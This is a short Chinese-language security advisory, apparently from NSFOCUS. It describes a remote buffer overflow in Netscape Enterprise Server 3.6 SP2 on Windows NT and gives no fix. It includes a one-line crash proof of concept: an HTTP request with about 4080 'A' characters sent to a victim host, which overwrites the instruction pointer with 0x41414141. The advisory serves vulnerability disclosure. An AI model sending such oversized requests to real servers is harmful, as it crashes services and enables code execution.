安全研究
安全漏洞
Netscape Enterprise Server 3.6 SP2远程缓冲区溢出漏洞
发布日期:2000-03-01
更新日期:2000-03-01
受影响系统:Netscape Enterprise Server 3.6 SP2
- Windows NT 4.0
不受影响系统:Netscape Enterprise Server 3.51I
- Solaris
描述:
在Netscape Enterprise Server version 3.6 SP2中存在一个缓冲区溢出漏洞,可能
允许远程用户执行任意代码.下面的简单的例子将使httpd.exe进程崩溃。
$ telnet victim.com 80
...
GET /[4080 x 'A'] HTTP/1.0
事实上,只要发送的字节长度足够长,不管采用什么提交方式(GET,POST,BLAH,...)都可以使
http server崩溃。Dr. Watson将会弹出一个信息窗口:
" Exception access violation (0xc0000005), Address 0x41414141 "
建议:
暂无
浏览次数:6560
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
